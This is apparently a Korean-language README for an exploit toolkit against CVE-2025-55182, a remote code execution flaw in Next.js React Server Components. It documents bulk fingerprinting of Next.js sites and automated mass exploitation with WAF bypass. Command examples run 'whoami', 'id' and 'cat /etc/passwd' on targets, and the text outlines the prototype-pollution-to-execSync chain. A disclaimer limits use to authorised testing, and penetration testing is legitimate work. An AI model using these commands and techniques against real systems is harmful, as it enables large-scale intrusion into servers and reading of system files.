
CVE-2025-55182에 대한 자동 탐지 및 익스플로잇 툴킷으로, Next.js React Server Components의 치명적인 RCE 취약점입니다. 다계층 핑거프린팅, WAF 우회, 벌크 스캐닝 기능을 제공하여 침투 테스트에 사용됩니다.
Next.js React Server Components 원격 코드 실행 취약점(CVE-2025-55182)을 테스트하기 위한 포괄적인 보안 연구 도구입니다.
이 툴킷은 CVE-2025-55182(React Server Components를 사용하는 Next.js 애플리케이션에 영향을 미치는 치명적인 RCE 취약점)에 대한 자동 탐지 및 익스플로잇 기능을 제공합니다. 툴킷은 세 가지 통합 구성 요소로 구성됩니다:
requests 라이브러리pip3 install requests
git clone https://github.com/yourusername/CVE-2025-55182-poc-tool.git
cd CVE-2025-55182-poc-tool
chmod +x exploit.sh auto_exploit.sh
대상을 스캔하고 익스플로잇하는 가장 빠른 방법:
# 대상 URL이 포함된 파일 생성 (한 줄에 하나씩)
echo "https://example.com" > targets.txt
# 하나의 명령으로 자동 스캔 및 익스플로잇
./auto_exploit.sh -i targets.txt -s -c "id"
익스플로잇 없이 Next.js 애플리케이션 식별:
python3 NextApp.py targets.txt
출력 파일:
confirmed_nextjs_targets.txt - 탐지된 모든 Next.js 애플리케이션high_confidence_nextjs_targets.txt - 높은 신뢰도의 탐지만 포함개별 대상 테스트:
# 기본 익스플로잇
./exploit.sh -d https://target.com -c "whoami"
# WAF 우회
./exploit.sh -d target.com -c "cat /etc/passwd" -w
# 사용자 정의 WAF 우회 크기
./exploit.sh -d target.com -c "ls -la" --waf-bypass --waf-size 256
# SSL 검증 건너뛰기
./exploit.sh -d https://target.com -c "id" -k
./auto_exploit.sh -i targets.txt -s -c "whoami"
# 1단계: Next.js 애플리케이션 탐지
python3 NextApp.py targets.txt
# 2단계: 확인된 대상 익스플로잇
./auto_exploit.sh -c "id"
# WAF 우회를 포함한 전체 자동 스캔
./auto_exploit.sh -i targets.txt -s -w --waf-size 256 -c "whoami"
# 사용자 정의 지연 시간 및 타임아웃
./auto_exploit.sh -i targets.txt -s --delay 5 --timeout 30 -c "id"
# 대량 모드에서 SSL 검증 건너뛰기
./auto_exploit.sh -i targets.txt -s -k -c "hostname"
python3 NextApp.py <targets_file>
인수:
targets_file - 대상 URL이 포함된 텍스트 파일 (한 줄에 하나씩)./exploit.sh [OPTIONS]
옵션:
| 옵션 | 설명 | 기본값 |
|---|---|---|
-d, --domain | 대상 도메인/URL | http://localhost:3000 |
-f, --file | 대상 목록이 있는 파일 | - |
-c, --command | 실행할 명령어 | id |
-w, --waf-bypass | WAF 우회 활성화 | 비활성화 |
--waf-size SIZE | WAF 우회 데이터 크기 (KB) | 128 |
--timeout SECONDS | 요청 타임아웃 | 15 |
-k, --insecure | SSL 검증 건너뛰기 | 비활성화 |
--user-agent AGENT | 사용자 정의 User-Agent | Mozilla/5.0... |
-h, --help | 도움말 메시지 표시 | - |
./auto_exploit.sh [OPTIONS]
옵션:
| 옵션 | 설명 | 기본값 |
|---|---|---|
-i, --input FILE | 입력 대상 파일 | confirmed_nextjs_targets.txt |
-o, --output FILE | 출력 결과 파일 | exploit_results.txt |
-c, --command CMD | 실행할 명령어 | id |
-w, --waf-bypass | WAF 우회 활성화 | 비활성화 |
--waf-size SIZE | WAF 우회 크기 (KB) | 128 |
--timeout SECONDS | 요청 타임아웃 | 15 |
-k, --insecure | SSL 검증 건너뛰기 | 비활성화 |
--delay SECONDS | 요청 간 지연 시간 | 2 |
-s, --scan | 먼저 Next.js 자동 스캔 | 비활성화 |
-h, --help | 도움말 메시지 표시 | - |
NextApp.py가 생성 - Next.js 애플리케이션으로 식별된 모든 URL 포함.
NextApp.py가 생성 - 높은 신뢰도의 Next.js 탐지만 포함 (신뢰도 점수 100+).
auto_exploit.sh가 생성 - 포괄적인 익스플로잇 보고서 포함:
스캐너는 신뢰도 점수 시스템과 함께 여러 탐지 기술을 사용합니다:
x-nextjs-*, x-vercel-*x-powered-by: Next.js__NEXT_DATA__ 존재 (100점)_next/* 에셋 경로 (개수에 따라 25-75점)__NEXT_DATA__, __NEXT_LOADED_PAGES__middlewareManifest, self.__RSC_MANIFEST신뢰도 임계값:
이 익스플로잇은 Next.js React Server Components의 프로토타입 오염 체인을 활용합니다:
__proto__ 체인 오염_response._prefix에 임의의 JavaScript 주입process.mainModule.require('child_process').execSync()를 통해 명령어 실행X-Action-Redirect 헤더에서 결과 추출이 툴킷에는 내장된 WAF 우회 기능이 포함되어 있습니다:
-w 또는 --waf-bypass 플래그로 활성화합니다.
# 대상 목록 생성
cat > targets.txt << EOF
https://app.example.com
https://dashboard.example.com
https://admin.example.com
EOF
# 통합 스캔 실행
./auto_exploit.sh -i targets.txt -s -c "whoami"
# 결과 확인
cat exploit_results.txt
./exploit.sh -d https://target.com -c "cat /etc/passwd" -w --waf-size 256
# 1단계: 탐지 및 필터링
python3 NextApp.py targets.txt
# 2단계: 높은 신뢰도 대상만 익스플로잇
./auto_exploit.sh -i high_confidence_nextjs_targets.txt -c "id"
이 도구는 허가된 보안 테스트 및 연구 목적으로만 사용됩니다. 사용자는 반드시:
허가되지 않은 컴퓨터 시스템 접근은 불법입니다. 저자는 이 도구의 오용에 대해 어떠한 책임도 지지 않습니다.
이 취약점을 발견하고 공개한 보안 연구원들에게 감사드립니다:
기여를 환영합니다! 다음 절차를 따라주세요:
문제, 질문 또는 기능 요청이 있으면 GitHub에서 이슈를 열어주세요.
이 프로젝트는 교육 및 허가된 보안 테스트 목적으로 제공됩니다. 책임감 있고 윤리적으로 사용하십시오.